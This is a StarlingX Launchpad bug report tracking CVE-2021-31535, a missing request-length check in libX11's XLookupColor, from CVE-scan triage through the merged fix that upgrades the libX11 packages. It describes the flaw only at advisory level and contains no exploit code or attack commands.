StarlingX

CVE-2021-31535 libX11: missing request length checks

Bug #1945997 reported by Ghada Khalil
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
StarlingX
Fix Released
High
Joe Slater

Bug Description

CVE-2021-31535 libX11: missing request length checks

CVSSv2: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Description:
LookupCol.c in X.Org X through X11R7.7 and libX11 before 1.7.1 might allow remote attackers to execute arbitrary code. The libX11 XLookupColor request (intended for server-side color lookup) contains a flaw allowing a client to send color-name requests with a name longer than the maximum size allowed by the protocol (and also longer than the maximum packet size for normal-sized packets). The user-controlled data exceeding the maximum size is then interpreted by the server as additional X protocol requests and executed, e.g., to disable X server authorization completely. For example, if the victim encounters malicious terminal control sequences for color codes, then the attacker may be able to take full control of the running graphical session.

References:
https://nvd.nist.gov/vuln/detail/CVE-2021-31535
https://access.redhat.com/errata/RHSA-2021:3296
https://access.redhat.com/security/cve/CVE-2021-31535
https://lists.centos.org/pipermail/centos-announce/2021-August/048354.html

Required package version:
libX11-1.6.7-4.el7_9.x86_64.rpm

Packages:
libX11

Found during September 2021 StarlingX CVE Scan

CVE References

Revision history for this message
Ghada Khalil (gkhalil) wrote :

Screening: Marking as high priority as this CVE meets the StarlingX fix criteria. Should be fixed in stx master and cherrypicked to the r/stx.5.0 release branch

Changed in starlingx:
assignee: nobody → Joe Slater (jslater0wind)
tags: added: stx.5.0 stx.6.0 stx.security
Changed in starlingx:
importance: Undecided → High
status: New → Triaged
Ghada Khalil (gkhalil)
information type: Public → Public Security
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to tools (master)

Fix proposed to branch: master
Review: https://review.opendev.org/c/starlingx/tools/+/812407

Changed in starlingx:
status: Triaged → In Progress
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to tools (master)

Reviewed: https://review.opendev.org/c/starlingx/tools/+/812407
Committed: https://opendev.org/starlingx/tools/commit/2b9dc324f15e58ee7536116210f5c4648320092d
Submitter: "Zuul (22348)"
Branch: master

commit 2b9dc324f15e58ee7536116210f5c4648320092d
Author: Joe Slater <email address hidden>
Date: Mon Oct 4 15:57:16 2021 -0400

    libX11: fix CVE-2021-31535

    Supply missing libX11 length checks. Advance to version
    1.67-4.el7_9 for libX11, libX11-devel, and libX11-common.

    Testing
    PASS: install/configure aio-sx
    PASS: install/configure aio-dx

    Closes-Bug: 1945997
    Change-Id: I873bddb58c64331547186b6f89d89b2ff6dbd76c
    Signed-off-by: Joe Slater <email address hidden>

Changed in starlingx:
status: In Progress → Fix Released
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.